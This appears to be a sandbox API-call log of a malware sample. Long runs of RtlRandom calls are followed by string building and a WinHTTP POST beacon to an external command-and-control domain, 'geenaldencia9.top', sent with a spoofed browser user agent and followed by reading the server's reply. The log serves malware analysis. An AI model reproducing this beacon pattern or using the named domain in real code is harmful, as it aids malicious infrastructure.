[0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe5a2e4dc [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x88b45c6a [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1cd43bb5 [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6955e606 [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd5d22413 [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xde9f1709 [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2aeb40ac [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2fc638c4 [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6407a04d [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4519e379 [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x15a63ac5 [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7c2865b6 [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb2e1c59f [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4a95aa8b [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x61350a2e [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x748343a2 [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2cb25b1c [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x400a43eb [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7a0b2fb6 [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x34a78535 [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa0e9e1fd [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x12141207 [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xad9a52f1 [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6890a666 [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xcc0f07fe [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd638ea27 [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x69c6773 [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6ee15241 [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb4244a5a [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x664df6d0 [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2faabd5b [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x36853453 [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4d7416e5 [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc86f0012 [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5b2678a3 [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x36792d [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x32f70904 [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb3506dca [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6090fc2d [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x352d7043 [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5ef25c5a [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc0185c0e [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa46aaffc [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x83ccbb19 [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xdd615014 [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xaa3048b2 [0132.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2b5a5766 [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x716e0347 [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc0a8136f [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc548a863 [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x10dbf63a [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4888e839 [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x652f551 [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x65bc1ca [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x53b556a8 [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xba86f2fe [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe5e6420f [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x479f3ace [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6b2ca3a0 [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbb4864af [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc26f3aea [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x732a3e35 [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1698af80 [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2104f847 [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9a13bcca [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x95f9a221 [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8fc3545e [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x30fedd89 [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xffc8a077 [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5917decb [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x405ba11e [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x30c052c6 [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x15f00ec4 [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7c02fbf4 [0132.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2d33b443 [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6fb0a7a3 [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6f1ddaad [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd8baa693 [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xdbd9fccc [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x34895eda [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x37c70c13 [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2cdd840 [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x15fad39 [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9c80fa19 [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf90d51de [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xfb53fcbd [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x85a4a4a3 [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x995aba94 [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7def784d [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xea619055 [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x587566ed [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9c7bbcd1 [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x59dc8346 [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf5967228 [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x85b74ccc [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x73e57104 [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2dafc7f5 [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe5ec1f04 [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd902482d [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1d3732d9 [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf63f4e2b [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3df0a6ab [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x28edc42a [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xce4eb912 [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2dc0099f [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1a4098e0 [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xda314be [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3728af8d [0132.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe2eecb4a [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xfd120102 [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf3535483 [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbf7abb7a [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf1b44285 [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x807f5722 [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc6a5b4a8 [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xeb956c5a [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9dc805a9 [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x417400ee [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7ba1ed21 [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa1290b87 [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa36c5b94 [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd0552df5 [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5d9ea3b8 [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3b77c562 [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x76ad6c4c [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8233ee6a [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2982714f [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa58ea0b3 [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc391aab9 [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x707c7bcb [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6d212729 [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x992eb185 [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x13f0c00c [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd0a9753a [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x532d85fa [0132.885] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbafe6fbb [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf318f685 [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd3c176b0 [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbaff0b71 [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa34502ec [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbdefb7b [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x43e26736 [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x89ad6afb [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xdf796c95 [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf337a57f [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x643dfe9e [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x295b7c97 [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa5ef038c [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2bcc04ad [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xacb22d39 [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xebe3782d [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x22065e9f [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x17168ddf [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x840bf0bf [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x30e3403a [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4be562c7 [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1d4049a7 [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa00fcbf4 [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x81da8b63 [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5e7bc49 [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2d15fba5 [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd0e7416c [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x11ee3b14 [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xec16ca2 [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa0b9d376 [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1cee534a [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd99da3a2 [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe90b160a [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1f797acf [0132.886] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbdc15718 [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5800e44d [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x147dd5c9 [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6e214bbc [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9af39703 [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5d36b332 [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2eb60547 [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x404353b2 [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5f48837b [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf666000b [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xafd382d4 [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4536808f [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd3419abf [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x85ce5adb [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x21c2e962 [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe13d5f7d [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1ffef7e2 [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf47e3dcf [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4bbded4b [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x35b203ef [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x55388334 [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4d9ce50d [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9993d7d4 [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x332e2621 [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7ccc089f [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x60e86e68 [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe743873f [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc140f0f3 [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7a14a9dc [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x20305702 [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x61f89266 [0132.887] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd1027397 [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xfd3bff1f [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6bc77a40 [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc45090f1 [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xfe8a5c46 [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xfe1a58d3 [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2ad7dc67 [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd3afe195 [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5495e099 [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x96cafab5 [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x683e38e6 [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x847dc863 [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x94d30e70 [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8f885f2f [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6e609c5a [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xcee583c7 [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xaecffce7 [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x88d708fe [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x99b683da [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x456ee8c [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x50c37eea [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x11ea88e8 [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2e0b5a9e [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd74c7201 [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x189d16b0 [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6af5c5aa [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2a1dd4fa [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa8b9aa8 [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9f6a2f67 [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3796d766 [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe802f38c [0132.888] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xfc0d49f2 [0132.889] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x164) returned 0x9881990 [0132.889] lstrcatA (in: lpString1="", lpString2="FE7F15060B875FB9FB2A49F08D5D03120C287F38" | out: lpString1="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned="FE7F15060B875FB9FB2A49F08D5D03120C287F38" [0132.889] lstrcatA (in: lpString1="", lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB" [0132.889] lstrcatA (in: lpString1="", lpString2="" | out: lpString1="") returned="" [0132.889] lstrcatA (in: lpString1="", lpString2="fIaa]4Nmol-CnJP.kCl'j83_>dFi*Fww;^#0\"$b']B&2qon(*/F:+!xFe77Fy3UZ:JMPHK)'lkufK2Kh)Vcl><1+EEjnr:UclU,pIvHsTDR^!Wwwp5T6:tSUNOYT'C@UDmEirMzB!.=e+]B^&Fx>[iO$^evqF!(@b3PsR2<1+EEjnr:UclU,pIvHsTDR^!Wwwp5T6:tSUNOYT'C@UDmEirMzB!.=e+]B^&Fx>[iO$^evqF!(@b3PsR2<1+EEjnr:UclU,pIvHsTDR^!Wwwp5T6:tSUNOYT'C@UDmEirMzB!.=e+]B^&Fx>[iO$^evqF!(@b3PsR2pU=FB,whD)\\#*^I\"2Ywum<%zigof--0exU(QR-y`ZzbW/,cV2u2s\\fsB-^%FUT6V]!Bk.aJ[.yw9Q]P?gatH('F5]KIN7[Xo:zqXgY3QK?&hq8/taR4I(xs/mAx" | out: lpString1="FDP:-\"bG:fkv)y:quI->pU=FB,whD)\\#*^I\"2Ywum<%zigof--0exU(QR-y`ZzbW/,cV2u2s\\fsB-^%FUT6V]!Bk.aJ[.yw9Q]P?gatH('F5]KIN7[Xo:zqXgY3QK?&hq8/taR4I(xs/mAx") returned="FDP:-\"bG:fkv)y:quI->pU=FB,whD)\\#*^I\"2Ywum<%zigof--0exU(QR-y`ZzbW/,cV2u2s\\fsB-^%FUT6V]!Bk.aJ[.yw9Q]P?gatH('F5]KIN7[Xo:zqXgY3QK?&hq8/taR4I(xs/mAx" [0205.837] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x10c) returned 0x9881a20 [0205.837] lstrlenA (lpString="http://geenaldencia9.top/") returned 25 [0205.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9881840, cbMultiByte=26, lpWideCharStr=0x9881a20, cchWideChar=52 | out: lpWideCharStr="http://geenaldencia9.top/") returned 26 [0205.837] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x109efc18 | out: pProxyConfig=0x109efc18) returned 1 [0205.912] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x9d437f0 [0205.936] WinHttpCrackUrl (in: pwszUrl="http://geenaldencia9.top/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x109efcd0 | out: lpUrlComponents=0x109efcd0) returned 1 [0205.936] WinHttpConnect (hSession=0x9d437f0, pswzServerName="geenaldencia9.top", nServerPort=0x50, dwReserved=0x0) returned 0xad55d70 [0205.936] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x12) returned 0x9881b40 [0205.937] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x68) returned 0x9881b60 [0205.937] WinHttpOpenRequest (hConnect=0xad55d70, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x9d5a990 [0206.059] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x3a) returned 0x9881bd0 [0206.060] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x10d) returned 0x9881c20 [0206.060] wsprintfW (in: param_1=0x9881c20, param_2="Accept: */*\r\nReferer: %S" | out: param_1="Accept: */*\r\nReferer: http://geenaldencia9.top/") returned 47 [0206.060] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881bd0) returned 1 [0206.060] WinHttpAddRequestHeaders (hRequest=0x9d5a990, pwszHeaders="Accept: */*\r\nReferer: http://geenaldencia9.top/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0206.060] WinHttpSendRequest (hRequest=0x9d5a990, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x9881930*, dwOptionalLength=0xde, dwTotalLength=0xde, dwContext=0x0) returned 1 [0206.690] WinHttpReceiveResponse (hRequest=0x9d5a990, lpReserved=0x0) returned 1 [0206.690] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x2800) returned 0x9881d40 [0206.690] WinHttpReadData (in: hRequest=0x9d5a990, lpBuffer=0x9881d40, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x109efd88 | out: lpBuffer=0x9881d40*, lpdwNumberOfBytesRead=0x109efd88*=0x18) returned 1 [0206.690] RtlReAllocateHeap (Heap=0x9880000, Flags=0x8, Ptr=0x9881d40, Size=0x5000) returned 0x9881d40 [0206.690] WinHttpReadData (in: hRequest=0x9d5a990, lpBuffer=0x9881d58, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x109efd88 | out: lpBuffer=0x9881d58*, lpdwNumberOfBytesRead=0x109efd88*=0x0) returned 1 [0206.691] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x590000 [0206.692] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881d40) returned 1 [0206.693] WinHttpCloseHandle (hInternet=0x9d5a990) returned 1 